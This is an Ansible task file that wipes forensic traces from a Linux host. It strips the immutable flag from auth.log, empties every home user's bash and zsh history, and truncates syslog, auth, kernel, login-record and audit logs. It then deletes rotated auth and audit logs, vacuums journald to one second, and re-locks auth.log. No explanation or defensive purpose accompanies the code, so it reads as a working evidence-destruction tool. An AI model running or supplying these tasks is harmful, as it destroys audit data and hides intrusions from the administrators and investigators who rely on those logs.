---
- name: Unset immutable attribute
  command: "chattr -i /var/log/auth.log"

- name: Get all passwd entries
  ansible.builtin.getent:
    database: passwd

- name: Filter users with home directories in /home
  set_fact:
    home_users: >-
      {{
        getent_passwd | dict2items 
        | selectattr('value.4', 'match', '^/home') 
        | list
      }}

- name: Clear shell history for all users #truncate -s 0
  ansible.builtin.shell: |
    > {{ item.value.4 }}/.bash_history
    > {{ item.value.4 }}/.zsh_history
  loop: "{{ home_users }}"
  failed_when: false

- name: Truncate system logs
  ansible.builtin.shell: |
    > /var/log/syslog
    > /var/log/auth.log
    > /var/log/kern.log
    > /var/log/wtmp
    > /var/log/btmp
    > /var/log/lastlog
    > /var/log/audit/audit.log
  changed_when: true

- name: Find rotated audit and auth logs
  ansible.builtin.find:
    paths: /var/log
    patterns: 
      - "auth.log.*"
      - "audit.log.*"
    use_regex: false
  register: rotated_logs

- name: Delete rotated logs
  ansible.builtin.file:
    path: "{{ item.path }}"
    state: absent
  loop: "{{ rotated_logs.files }}"

- name: Clear journald logs
  ansible.builtin.shell: |
    journalctl --rotate
    journalctl --vacuum-time=1s
  changed_when: true

- name: Set immutable attribute
  command: "chattr +i /var/log/auth.log"